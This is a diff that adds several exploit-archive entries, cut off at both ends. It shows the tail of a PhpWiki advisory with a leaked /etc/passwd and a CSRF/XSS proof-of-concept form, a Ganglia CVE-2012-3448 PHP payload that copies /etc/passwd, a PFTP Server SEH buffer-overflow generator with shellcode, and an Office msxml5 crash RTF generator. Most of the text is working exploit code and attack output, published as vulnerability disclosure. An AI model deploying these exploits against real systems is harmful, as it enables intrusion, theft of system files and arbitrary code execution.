+        <em><a href="passwd" class="wiki">passwd</a></em><span> from “plain file /etc/passwd” content is identical to current version 1 - no new revision created</span><p><strong>Complete.</strong></p>
+<p>Return to <a href="PhpWikiAdministration" class="wiki">PhpWikiAdministration</a></p>
+(...)
+
+#2 - Example request:
+GET /phpwiki/index.php/passwd HTTP/1.1
+Host: 192.168.0.10
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration
+Cookie: folder_p-tbx=Open; PhpWiki_WIKI_ID=admin; PHPSESSID=643k8jmar8jielfn3metobp625
+Connection: keep-alive
+
+#2 - Example response:
+HTTP/1.1 200 OK
+Date: Sat, 29 Aug 2015 22:10:34 GMT
+Server: Apache/2.2.22 (Debian)
+X-Powered-By: PHP/5.4.41-0+deb7u1
+ETag: W/"97df6cb9b2668497eb1a804ab9c18eb8"
+Last-Modified: Sat, 29 Aug 2015 22:09:55 GMT
+Cache-Control: must-revalidate
+Expires: Sat, 29 Aug 2015 22:10:14 GMT
+Vary: Cookie
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html
+Content-Length: 22599
+(...)
+        
+<div class="wikitext"><p>root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/bin/sh
+man:x:6:12:man:/var/cache/man:/bin/sh
+lp:x:7:7:lp:/var/spool/lpd:/bin/sh
+mail:x:8:8:mail:/var/mail:/bin/sh
+<a href="news:x:9:9:news:/var/spool/news:/bin/sh" target="_blank" class="namedurl"><span style="white-space: nowrap"><img src="/phpwiki/themes/Sidebar/images/url.png" alt="" class="linkicon" />news:x:9:9:news:/var/spool/news:/bin/sh</span></a>
+uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
+proxy:x:13:13:proxy:/bin:/bin/sh
+www-data:x:33:33:www-data:/var/www:/bin/sh
+backup:x:34:34:backup:/var/backups:/bin/sh
+list:x:38:38:Mailing List Manager:/var/list:/bin/sh
+irc:x:39:39:ircd:/var/run/ircd:/bin/sh
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
+nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
+libuuid:x:100:101::/var/lib/libuuid:/bin/sh
+mysql:x:101:103:MySQL Server<sub>,:/nonexistent:/bin/false
+messagebus:x:102:106::/var/run/dbus:/bin/false
+colord:x:103:107:colord colour management daemon</sub>,:/var/lib/colord:/bin/false
+usbmux:x:104:46:usbmux daemon<sub>,:/home/usbmux:/bin/false
+miredo:x:105:65534::/var/run/miredo:/bin/false
+ntp:x:106:113::/home/ntp:/bin/false
+Debian-exim:x:107:114::/var/spool/exim4:/bin/false
+arpwatch:x:108:117:ARP Watcher</sub>,:/var/lib/arpwatch:/bin/sh
+avahi:x:109:118:Avahi mDNS daemon<sub>,:/var/run/avahi-daemon:/bin/false
+beef-xss:x:110:119::/var/lib/beef-xss:/bin/false
+dradis:x:111:121::/var/lib/dradis:/bin/false
+pulse:x:112:122:<span style="text-decoration: underline" class="wikiunknown"><span>PulseAudio</span><a href="PulseAudio?action=create" title="Create: PulseAudio" onmouseover="window.status="Create: PulseAudio"; return true;" onmouseout="window.status='';return true;" rel="nofollow">?</a></span> daemon</sub>,:/var/run/pulse:/bin/false
+speech-dispatcher:x:113:29:Speech Dispatcher<sub>,:/var/run/speech-dispatcher:/bin/sh
+haldaemon:x:114:124:Hardware abstraction layer</sub>,:/var/run/hald:/bin/false
+iodine:x:115:65534::/var/run/iodine:/bin/false
+postgres:x:116:127:PostgreSQL administrator<sub>,:/var/lib/postgresql:/bin/bash
+sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin
+redsocks:x:118:128::/var/run/redsocks:/bin/false
+snmp:x:119:129::/var/lib/snmp:/bin/false
+stunnel4:x:120:130::/var/run/stunnel4:/bin/false
+statd:x:121:65534::/var/lib/nfs:/bin/false
+sslh:x:122:133::/nonexistent:/bin/false
+Debian-gdm:x:123:134:Gnome Display Manager:/var/lib/gdm3:/bin/false
+rtkit:x:124:136:<span style="text-decoration: underline" class="wikiunknown"><span>RealtimeKit</span><a href="RealtimeKit?action=create" title="Create: RealtimeKit" onmouseover="window.status="Create: RealtimeKit"; return true;" onmouseout="window.status='';return true;" rel="nofollow">?</a></span></sub>,:/proc:/bin/false
+saned:x:125:137::/home/saned:/bin/false
+devil:x:1000:1001:devil<sub>,:/home/devil:/bin/bash
+debian-tor:x:126:138::/var/lib/tor:/bin/false
+privoxy:x:127:65534::/etc/privoxy:/bin/false
+redis:x:128:139:redis server</sub>,:/var/lib/redis:/bin/false</p>
+</div>
+(...)
+
+
+3/ Cross Site Request Forgery
+
+Since there is no csrf protection in application, remote attacker is able to trigger specific actions.
+
+PoC:
+<html>
+  <!-- Change settings / XSS -->
+  <body>
+    <form action="http://192.168.0.10/phpwiki/index.php/UserPreferences" method="POST">
+      <input type="hidden" name="pref&#91;email&#93;" value="" />
+      <input type="hidden" name="pref&#91;notifyPages&#93;" value="" />
+      <input type="hidden" name="pref&#91;theme&#93;" value="" />
+      <input type="hidden" name="pref&#91;lang&#93;" value="" />
+      <input type="hidden" name="pref&#91;editHeight&#93;" value="22" />
+      <input type="hidden" name="pref&#91;editWidth&#93;" value="80" />
+      <input type="hidden" name="pref&#91;timeOffset&#93;" value="0" />
+      <input type="hidden" name="pagename" value="UserPreferencesabc<&#47;script><script>alert&#40;document&#46;cookie&#41;<&#47;script><&#33;&#45;&#45;" />
+      <input type="hidden" name="action" value="browse" />
+      <input type="submit" value="Go" />
+    </form>
+  </body>
+</html>
diff --git a/platforms/php/webapps/38030.php b/platforms/php/webapps/38030.php
new file mode 100755
index 000000000..9de01e216
--- /dev/null
+++ b/platforms/php/webapps/38030.php
@@ -0,0 +1,38 @@
+<?php
+/*
+
+################################################################################
+#
+# Author    : Andrei Costin (andrei theATsign firmware theDOTsign re)
+# Desc      : CVE-2012-3448 PoC
+# Details   : This PoC will create a dummy file in the /tmp folder and 
+#             will copy /etc/passwd to /tmp.
+#             To modify the attack payload, modify the code below.\
+# Setup     : Ubuntu Linux 14.04 LTS x86 with Ganglia Web Frontend 3.5.0
+#
+################################################################################
+
+1. Assuming that ganglia is installed on the target machine at this path:
+/var/www/html/ganglia/
+
+2. Assuming the attacker has minimal access to the target machine and 
+can write to "/tmp". There are several methods where a remote attacker can 
+also trigger daemons or other system processes to create files in "/tmp" 
+whose content is (partially) controlled by the remote attacker. 
+
+3. The attacker puts the contents of this PoC file into the file:
+/tmp/attack.php
+
+4. The attacker visits the Ganglia Web Frontend interface with version < 3.5.1 
+as:
+http://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY
+
+5. Confirm that the PoC created a dummy file in the /tmp folder and copied 
+/etc/passwd to /tmp.
+
+*/
+
+eval('touch("/tmp/attacker.touch"); copy("/etc/passwd", "/tmp/attacker.passwd");');
+die("Triggering CVE-2012-3448 attack.php");
+
+?>
diff --git a/platforms/windows/dos/38028.pl b/platforms/windows/dos/38028.pl
new file mode 100755
index 000000000..8fa97672e
--- /dev/null
+++ b/platforms/windows/dos/38028.pl
@@ -0,0 +1,58 @@
+#*************************************************************************************************************
+# 
+# Exploit Title: PFTP Server 8.0f (lite) SEH bypass technique tested on Win7x64   
+# Date: 8-29-2015
+# Software Link: http://www.heise.de/download/the-personal-ftp-server-78679a5e8458e9faa7c5564617bdd4c4-1440883445-267104.html
+# Exploit Author: Robbie Corley
+# Contact: c0d3rc0rl3y@gmail.com
+# Website: 
+# CVE: 
+# Category: Local Exploit
+#
+# Description:
+# There is a textfield within the program that asks for IPs to be blocked against the FTP server that is vulnerable to an SEH based buffer overflow.
+#
+# Side Notes: I haven't been able to implement a partial EIP overwrite for ASLR on this exploit, so I had to resort
+# to manually adding an exception to ASLR in the registry for this to work.
+# creds to Corelan & team: https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/
+#
+# Edit HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\ and add a new key called “MoveImages” (DWORD)
+# set the key to '0'.
+#
+# Instructions:
+# Generate the payload text file by running this payload creator as is.  The payload is called: buffy.txt by default
+# Next, open the pftp.exe program.
+# Click 'options', 'advanced options', and 'block ip'.  Click on the text field and paste 
+# in your payload generated by this payload creator and click 'Add'.  It will look like this:
+#AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA됐31Ò²0d‹‹R‹R‹B‹r ‹€~3uò‰Çx<‹Wx
‹z 
Ç1í‹4¯
ÆE>Fatauò~Exitué‹z$
Çf‹,o‹z
Ç‹|¯ü
Çhyte
hkenBh Bro‰áþI1ÀQPÿא
+#
+# that's it.  You should then be greeted with a MessageBox.  
+#**************************************************************************************************************
+
+my $junk = "A" x 272;
+
+#$nseh = "\xcc\xcc\xcc\xcc"; # breakpoint for testing
+
+$nseh = "\xeb\x10\x90\x90";  # jump to shellcode
+$seh = pack('V',0x03033303); # popad, call ebp from \Device\HarddiskVolume1\Windows\Fonts\StaticCache.dat, which is outside the module range and has SEH off
+
+#MessageBox Shellc0de 
+#https://www.exploit-db.com/exploits/28996/
+
+my $shellcode =
+"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
+"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
+"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
+"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
+"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
+"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74".
+"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe".
+"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
+
+$nops = "\x90" x 20; 
+my $junk2   = "\x90" x 1000;
+
+open(myfile,'>buffy.txt');
+
+print myfile $junk.$nseh.$seh.$nops.$shellcode.$junk2;
+close (myfile);
\ No newline at end of file
diff --git a/platforms/windows/dos/38031.pl b/platforms/windows/dos/38031.pl
new file mode 100755
index 000000000..52f1e924d
--- /dev/null
+++ b/platforms/windows/dos/38031.pl
@@ -0,0 +1,41 @@
+#!/usr/bin/perl -w
+# Title : Microsoft Office 2007 msxml5.dll - Crash Proof Of Concept
+# Tested : Microsoft Office 2007 / Win7
+# DLL : msxml5.dll 5.20.1072.0
+# WINWORD.EXE version : 12.0.6612.1000
+#
+#
+# Author      :   Mohammad Reza Espargham
+# Linkedin    :   https://ir.linkedin.com/in/rezasp
+# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
+# Website     :   www.reza.es
+# Twitter     :   https://twitter.com/rezesp
+# FaceBook    :   https://www.facebook.com/mohammadreza.espargham
+#
+#Demo : http://youtu.be/Eciu50k7vbI
+ 
+open FILE, ">poc.rtf";
+
+$buffer="\x7b\x5c\x72\x74\x66\x31\x7b\x5c\x66\x6f\x6e\x74\x74\x62\x6c\x7b\x5c\x66\x30\x5c".#rtf1 Standard Header...
+"\x66\x6e\x69\x6c\x5c\x66\x63\x68\x61\x72\x73\x65\x74\x30\x56\x65\x72\x64\x61\x6e\x61\x3b".
+"\x7d\x7d\x5c\x76\x69\x65\x77\x6b\x69\x6e\x64\x34\x5c\x75\x63\x31\x5c\x70\x61\x72\x64\x5c".
+"\x73\x62\x31\x30\x30\x5c\x73\x61\x31\x30\x30\x5c\x6c\x61\x6e\x67\x39\x5c\x66\x30\x5c\x66".
+"\x73\x32\x32\x5c\x70\x61\x72\x5c\x70\x61\x72\x64\x5c\x73\x61\x32\x30\x30\x5c\x73\x6c\x32".
+"\x37\x36\x5c\x73\x6c\x6d\x75\x6c\x74\x31\x5c\x6c\x61\x6e\x67\x39\x5c\x66\x73\x32\x32\x5c".
+"\x70\x61\x72\x7b\x5c\x6f\x62\x6a\x65\x63\x74\x5c\x6f\x62\x6a\x6f\x63\x78\x7b\x5c\x2a\x5c".
+"\x6f\x62\x6a\x64\x61\x74\x61\x0a\x30\x31\x30\x35\x30\x30\x30\x30\x30\x32\x30\x30\x30\x30".
+
+"\x30\x30\x31\x42\x30\x30\x30\x30\x30\x30\x34\x44\x35\x33\x34\x33\x36\x46\x36\x44\x36\x33\x37\x34\x36\x43\x34\x43\x36\x39\x36\x32\x32\x45\x34\x43\x36\x39\x37\x33\x37\x34\x35\x36\x36\x39\x36\x35\x37\x37\x34\x33\x37\x34\x37\x32\x36\x43\x32\x45\x33\x32\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x45\x30\x30\x30\x30\x0a\x44\x30\x43\x46\x31\x31\x45\x30\x41\x31\x42\x31\x31\x41\x45\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x33\x45\x30\x30\x30\x33\x30\x30\x46\x45\x46\x46\x30\x39\x30\x30\x30\x36\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x32\x30\x30\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x46\x45\x46\x46\x46\x46\x46\x46\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46".
+"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x44\x46\x46\x46\x46\x46\x46\x46\x45\x46\x46\x46\x46\x46\x46\x46\x45\x46\x46\x46\x46\x46\x46\x30\x34\x30\x30\x30\x30\x30\x30\x30\x35\x30\x30\x30\x30\x30\x30\x46\x45\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x35\x32\x30\x30\x36\x46\x30\x30\x36\x46\x30\x30\x37\x34\x30\x30\x32\x30\x30\x30\x34\x35\x30\x30\x36\x45\x30\x30\x37\x34\x30\x30\x37\x32\x30\x30\x37\x39\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x36\x30\x30\x30\x35\x30\x30\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x30\x32\x30\x30\x30\x30\x30\x30\x34\x42\x46\x30\x44\x31\x42\x44\x38\x42\x38\x35\x44\x31\x31\x31\x42\x31\x36\x41\x30\x30\x43\x30\x46\x30\x32\x38\x33\x36\x32\x38\x30\x30\x30\x30\x30\x30\x30\x30\x36\x32\x65\x61\x44\x46\x42\x39\x33\x34\x30\x44\x43\x44\x30\x31\x34\x35\x35\x39\x44\x46\x42\x39\x33\x34\x30\x44\x43\x44\x30\x31\x30\x33\x30\x30\x30\x30\x30\x30\x30\x30\x30\x36\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x33\x30\x30\x34\x46\x30\x30\x36\x32\x30\x30\x36\x41\x30\x30\x34\x39\x30\x30\x36\x45\x30\x30\x36\x36\x30\x30\x36\x46\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x32\x30\x30\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30".
+
